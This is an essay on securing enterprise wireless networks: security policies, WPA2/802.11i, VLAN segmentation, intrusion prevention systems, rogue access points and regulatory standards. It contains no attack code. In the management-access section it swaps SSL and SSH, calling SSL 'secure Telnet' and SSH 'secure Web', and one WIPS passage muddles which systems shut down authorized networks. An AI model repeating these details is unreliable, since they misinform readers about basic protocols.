Wireless Security in large Enterprises:
Abstract:
The Wireless Local Area Network (WLAN) industry is the newest and fastest growing networking technology in the market, overcome only by its security limitations. WLAN technology is now recognized, accepted and adopted by organizations worldwide. Many governments and companies now realize the competitive advantage gained by deploying wireless technologies in workplaces. Wireless technologies continue to evolve and provide milestone advancements in bandwidth, speed and security. However, large scale enterprises are reluctant to adopt wireless networks due to perceived security issues and risks posed to organizations.
WLAN is a disruptive technology with various security constraints. The WLAN industry today is quite heated especially due to the adoption of new technologies, impelled by an impatient user base constantly demanding for feature addition. All this happens while vendors are still trying to address existing wireless security issues. However, even with this drawback, the industry’s high priority is to reduce the risk of compromise while still improving the technologies.
This paper addresses the various wireless security issues in large enterprise environments and provides an overview of components, technologies, trends, standards, regulatory issues and challenges associated with wireless network security. The key issue plaguing today’s industry is whether wireless networks can be securely deployed. There is an inherent perception that wireless networks are insecure. This paper sheds light on security limitations of enterprise WLAN deployment and how to fix them. Additionally, the paper covers current wireless security trends in large enterprises and provides guidelines for the future of wireless network security. The global implications of the technologies and some of the industry players are also discussed.
Introduction: Enterprise WLAN Security Overview.
Rapid deployment of Wi-Fi networks by various large scale enterprises globally has led to the emergence of a whole new dimension in network security where wireless networks are vulnerable to malicious hackers or even casual intruders. Data and applications have literally launched on to the airwaves with credit being given to improvements in productivity and efficiency brought by the extensive use of mobile tools such as tablets, smartphones and notebook PC’s. Apart from the existent wired network infrastructure, WLAN has been found to help companies deliver services more efficiently, improve customer response and improve the customer experience in general.
The major implication of accessing corporate data via wireless networks is that these networks are easily accessible by unwanted visitors and intruders if proper tools and precautions are not set-up to protect them. More surprising is the fact that the wired enterprise network is susceptible to unauthorized access when proper measures are not enforced. There exist five critical areas that need to be examined when securing enterprise wireless networks:
- Creation of wireless network security policies.
- Securing of the enterprise WLAN.
- Securing the enterprise wired/Ethernet network.
- Securing corporate wireless devices e.g. laptops from wireless threats outside the enterprise.
- Employee education regarding wireless policies.
The paper discusses real industry approaches to wireless security and the above best practices to secure an enterprise wireless network. However, WLAN security practices should be complemented by strong wired network security policies and strong access controls. Assumptions are made that strong VPN, firewall, wired network IDS/IPS and VLAN architecture setups for multiple user environments already exist. This combination can collectively protect an enterprise from unauthorized access, damage and theft to a company’s reputation with clients and partners.
- Creation of wireless network security policies:
In securing a large enterprise wireless network, it is good to develop a wireless security policy covering authorized network use and security measures. The background for a wireless policy document should be accurately and thoroughly researched. This is because most security issues are traceable to errors and oversights made during implementation of the security policy. Some of the sections included in a typical policy document include the purpose, scope, policy, responsibilities, enforcement, definitions and revision history of the wireless network.
- Securing the enterprise WLAN:
The deployment of WLANs over the years has switched from guest access in conference areas, limited connectivity hotspots within large enterprises to full organizational coverage. However, many of these deployments are insecure and leave opportunities for curious or malicious intruders to try and gain access to confidential enterprise information. Securing a WLAN is made easier by technology advances and vendor innovation. Best practices include:
Changing the default/manufacturer’s SSID to a customized one:
WLAN network access points usually have a default network name created by the manufacturer. This name is broadcast to clients, advertising an access point’s availability. The name can be a standard name such as Linksys, D-link etc. Immediately after installation, this should be changed to a name that is not directly related to the enterprise. Names to avoid are company names, phone numbers or other readily available company information that can be easily guessed or found on the internet.
Use of Strong Encryption and Authentication protocols:
The default access point settings enable open access with no security measure enabled. This is a major reason why WLANs are hacked or accessed by unauthorized personnel. When deploying wireless networks in enterprises, it is, therefore necessary, to enable the secure access. For large enterprises, the most secure encryption and authentication methods are IEEE 802.11i or using a highly encrypted VPN.
IEEE 802.11i is also known as WPA 2 when an access point is Wi-Fi Alliance Certified. WPA2 uses IEEE 802.1x for mutual authentication between the client and the network, and AES for encryption of data. Its predecessor, WPA was an interim form of security also certified by the Wi-Fi Alliance during the ratification of the 802.11i standard. WPA uses the 802.1x for authentication but uses TKIP encryption as opposed to AES which is the stronger encryption method.
WPA and WPA2 (802.11i) require to use a RADIUS server for the provision of unique, rotating encryptions keys to all clients. Various manufacturers such as Cisco, Meetinghouse and Funk Software provide WPA and 802.11i compliant RADIUS servers.
When WPA and WPA2 cannot be used, the next solution for securing the client connection to a WLAN is a VPN (Virtual Private Network). SSL and IPsec VPNs are as secure as WPA and 802.11i. However, these have a major disadvantage when used in large WLAN deployments since all traffic must be channeled through the VPN server thus creating bottlenecks. Another disadvantage is that applications that are latency intensive such as Citrix and wireless VoIP may lose connection when roaming due to long latencies.
When all the above methods cannot be used, it would be advisable to turn on WEP, which can easily be cracked by a hacker using readily available tools from the internet. While it is insecure for large enterprises, it will at least deter casual snoopers while stronger security measures are formulated.
User Population Segmentation using VLANs:
Various user groups in an enterprise need to access the WLAN. Access points supporting Virtual LANs (VLANs) allow each authorized WLAN user to gain entry to only those network resources that they require e.g. shipping and manufacturing personnel may have access to the WLAN using SSID operations that only allow email and ERP systems access. Marketing and sales departments may access the WLAN using the SSID that accesses sales and customer database information. These would support both the strong WPA and 802.11i encryption.
In large enterprises, barcode scanners may be used to track inventories or receive goods. Wireless VoIP is also gaining popularity and thus Wi-Fi phones may become prevalent. All these devices do not support the strong WPA or 802.11i encryption, but they do support WEP. These can be segregated on a specified SSID supporting WEP, and routing traffic to a specific VLAN that allows access to a database or application they require. This, along with frequent changes of MAC address control lists and keys would help mitigate security risks.
Secure Management Access:
The management interfaces of WLAN systems should have support for secure and authenticated management methods. Access point reconfiguration through a management port is a method an attacker may use to gain access to the corporate network. WLAN systems should thus provide SSL (secure Telnet), SSH (secure Web) and SNMPv3 interfaces. The system should also be configurable such that management and modification of WLAN settings can only be done by stations on a specified management VLAN.
Physical Security of Access Points:
Access points should be secured against direct access, tampering and theft. Wi-Fi access points should be deployed above suspended ceilings such that they are not visible, with only the antenna being visible. If this is impossible, and access points can be accessed physically, their management through a local serial port should be disabled or be availed securely. New switch based WLAN architectures also provide security by storing information in a centralized wireless switch that can be located in a secure wiring cabinet, as opposed to local storage in the access point.
Physical Monitoring of Premises:
Wireless access point signals may extend beyond workplace perimeters making it possible for persons outside the premises to connect to a network internally while they are not in the actual premises. Surveillance cameras may be used, or security personnel alerted to be aware of persons loitering suspiciously around the premises for an extended period.
- Securing the Enterprise Wired Network Against Wireless Threats:
While all the previously discussed precautions may have been taken in securing enterprise WLAN, serious security vulnerabilities may still be existent, exposing enterprises to various risks and possible regulatory violations such as HIPAA or Sarbanes-Oxley. While some enterprises may still stick to wired networks and “No Wi-Fi” policies, this does not guarantee security from wireless threats. This is because employees can create rogue access points especially when Wi-Fi enabled laptops connect to neighboring networks.
The above mentioned threats are real and significant, and traditional wired network security infrastructure such as VPNs and firewalls do not detect these threats. Again once a device is through the corporate firewall, it is regarded as trusted. In this era where Wi-Fi is almost ubiquitous, the corporate airspace should be considered an asset and be well protected. Methods to secure the enterprise wired network and prevent wireless intrusion include:-
Deployment of Automatic Wireless Intrusion Prevention and Detection Systems:
Wireless Intrusion Prevention Systems (WIPS) are third party security systems for preventing Wi-Fi attacks. WIPS detect all wireless transmissions within their radius and classify them depending on the rules set-up by the network administrator. They can automatically quarantine rogue transmissions and devices. To detect and stop various categories of wireless attacks, WIPS use deterministic techniques that involve a combination of auto event and device classification, association and protocol analysis. Signatures only provide extra details and are not necessary for detection.
Use of Overlay vs. Embedded WIPS:
While vendors may claim to provide sufficient WIPS capabilities in their network infrastructure, several critical problems exist in an integrated approach, thus only limited protection may exist. For companies with ‘no-Wi-Fi’ policies or enterprises that do not employ enterprise-wide wireless, integrated solutions are not feasible. Enterprises thus need to protect the entire airspace whether or not they have WLAN since employees are likely to introduce rogue access points or connect to neighboring networks in areas where authorized WLANs are not installed. Even for companies that employ enterprise-wide WLANs, integrated solutions still do not offer adequate protection. Integrated solutions are usually attractive due to the assumed low costs of a single RF device deployment and pulling a single cable.
However, use of access points as sensors requires a trade-off between continuous threat monitoring and client connectivity since an access point radio cannot simultaneously serve clients while scanning all bands in the channel. As more Wi-Fi devices join the enterprise network requiring network connectivity, the integrated approach becomes less feasible.
Secondly, infrastructure vendors do not focus majorly on securing corporate networks but rather provision of robust and reliable wireless client services, and while Wi-Fi threats continue to evolve rapidly, the vendors are unable to keep up with the rapid changes in wireless security. In most cases, intrusion detection and prevention capabilities of WLAN are minimal and disruptive e.g. many solutions claim to detect and prevent rogue access points. It may happen that some of the access points are not on the switch network, and are thus deemed rogue while some are completely harmless neighboring networks or legacy WLAN’s that are still operational. The prevention methods used by WIPS are brute force which brings down the rogue access point, and shuts down authorized WLANs.
Security auditors may also enforce separate infrastructure in order to ensure compliance with regulations such as HIPAA and Sarbanes-Oxley.
Employing Wired Side Port blocking:
Wired side port blocking is a technique usually employed beside WIPS. Some manufacturers have even integrated their WIPS systems with wired network equipment manufacturers to complement wireless intrusion prevention system with wired port suppression. In such situations, the WIPS server communicates with central management appliances in the wired network thus providing information on rogue access points. Using this information, management appliances can then prevent all traffic from the wired switch port where the rogue access point is connected.
Using Location Tracking for Physical Rectification:
The final step to eliminate wireless threats is the physical removal of rogue access point devices. However, physically locating these devices is not easy and conventionally handheld analyzers have been used to track the location of rogue devices. However, since wireless propagations are not on-point and can extend to large distances, this method is time consuming especially for large multi-floor enterprises. Modern IDS/IPS, however, provides higher precision in location tracking for quick rogue device removal.
Performing Regular Wireless Vulnerability Assessments:
Regular wireless vulnerability assessments should be performed by both internal and external network security auditors. This may involve the use of hacking tools to specifically probe for different types of threats and security loopholes. This should be done regularly to ensure new wireless threats are discovered and contained. If not containable, security holes may exist and thus the manufacturers should be called for software updates of the network infrastructure.
- Securing Corporate Assets when outside the enterprise premises:
Even outside the enterprise, wireless threats to it still exist especially due to the high proliferation of public Wi-Fi hotspots. Laptops used within the corporate environment should have the same protection as the enterprise network to protect them it from the many threats they are susceptible to when connected to external public networks. Personal firewalls, antivirus software and use of VPN may help protect against these threats. User authentication and data encryption for access control and data protection are also strong security measures especially the use of passwords, smart cards and drive encryption. The use of ad hoc peer-to peer wireless networks for file sharing should also be discouraged especially in public areas where corporate information may be exposed to snoopers.
- Employee education on WLAN security policies:
Even with well set up wireless network security infrastructure in large enterprises, human error is still a significant cause of security vulnerabilities. Employees must thus be educated on the set wireless security policy, implications of non-compliance and the threats posed.
Regulatory Issues, Organizations involved and Future trends in wireless security:
The IEEE, manufacturers, vendors and other stakeholders have come a long way to secure WEP vulnerabilities. Full implementation of WPA 2 (802.11i) may provide large enterprises with high assurance that only authorized user can gain network access.
In the US, Department of Defense (DOD) requires corporate WLANs to incorporate extensive protection measures on all data and voice traffic transmitted over a wireless network. They therefore defined the Federal Information Processing Standards (FIPS) 140-2 and Common Criteria to standardize WLAN security requirements including WLAN Access System Protection Profile requirements. These standards have been implemented by healthcare, retail, financial and other large business enterprises making FIPS certification central in the demonstration of WLAN security deployments that are accepted by the IT community.
Manufacturers have also taken on the responsibility of designing FIPS compliant infrastructure. A good example is Motorola whose enterprise class switch platforms RFS7000 and WS5100 have been FIPS 140-2 and Common Criteria certified. Other manufacturers such as Cisco Systems and Trapeze networks are also major industry players in enterprise wireless network security, offering solutions that add extra security layers than those defined by the infrastructure.
Global Implications and future trends:
When WEP was found to have vulnerabilities and WPA and WPA 2 (802.11i) were developed, it was thought that these technologies could not be hacked. However, recent developments have shown that WPA secured wireless networks can be cracked which show the rampant evolution of technology and the industry’s slow pace in keeping up.
As observed with the case of WPA, future advancements in technology may never render WLANs totally hack-proof and the Fort Knox solution to enterprise-wide wireless security may not be achieved soon. However, with the right network infrastructure, deployed with WPA or WPA 2, enterprise organizations can enjoy high security levels for their networks as new technologies continue to be discovered.
It is expected that large enterprises and governments all over the world will adopt the wireless enterprise network security measures and technologies discussed above to protect their networks and gain a competitive edge in service delivery. Organizations, governments and individuals may also come up with more innovative ways of securing wireless networks by conducting extensive research in this area.
Conclusion:
The nature of the enterprise has gradually evolved from the Ethernet paradigm to mobile wireless connectivity especially for large enterprises. However, the challenge for securing confidential corporate information is now greater than ever. While it is no doubt that wireless technology has generally led to improvement in productivity, organizations must find secure ways of deploying it, and still remain competitive. Fortunately, the wireless networking industry has also evolved tremendously, developing new security solutions and standards for enterprise-wide wireless networks. Protecting corporate WLANs today both on and offsite is possible thus allowing enterprises to focus on tasks at hand such as serving clients and gaining a competitive edge.
References:
Informationweek (2013). InformationWeek. [online] Retrieved from: http://networkmagazine.com/ shared/article/showArticle.jhtml?articled=15201417 [Accessed: 24 Apr 2013].
Isaac.cs.berkeley.edu (2001). (In)Security of the WEP algorithm. [online] Retrieved from: http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html [Accessed: 24 Apr 2013].
Itl.nist.gov (n.d.). WIRELESS TECHNOLOGY AND SECURITY. [online] Retrieved from: http://www.itl.nist.gov/lab/bulletns/bltnmar03.htm [Accessed: 24 Apr 2013].
Unknown. (2006). Best Practices for Securing Your Enterprise Wireless Network. [e-book] 339 N. Bernardo Avenue, Mountain View, CA 94043: Air Tight Networks. Available through: www.airtightnetworks.net http://www.airtightnetworks.com/fileadmin/pdf/whitepaper/Best_Practices_for_Securing_Your_Enterprise_Wireless_LAN.pdf [Accessed: 22 Apr 2013].
Unknown. (2008). Enterprise Wireless LAN Security. [e-book] Motorola. Available through: www.motorola.com http://www.motorola.com/web/Business/_Documents/static%20files/Enterprise%20WLAN%20Security_WP_0308.pdf [Accessed: 22 Apr 2013].
Unknown. (2013). Untitled. [online] Retrieved from: http://www.iss.net/wireless/ WLAN_FAQ.php “Cisco SAFE: Wireless LAN [Accessed: 24 Apr 2013].
Wifialliance.com (2013). Wi-Fi Alliance. [online] Retrieved from: http://www.wifialliance.com [Accessed: 24 Apr 2013].
Wi-fiplanet.com (2003). Infrared WLAN. [online] Retrieved from: http://www.wi-fiplanet.com/tutorials/article.php/2110301 [Accessed: 24 Apr 2013].
Wi-fiplanet.com (2003). WPA Security Enhancements. [online] Retrieved from: http://www.wi-fiplanet.com/tutorials/article.php/2148721 [Accessed: 24 Apr 2013].
Wi-fiplanet.com (2005). Wi-Fi Alliance Plans for the Future. [online] Retrieved from: http://www.wi-fiplanet.com/news/article.php/3495936 [Accessed: 24 Apr 2013].
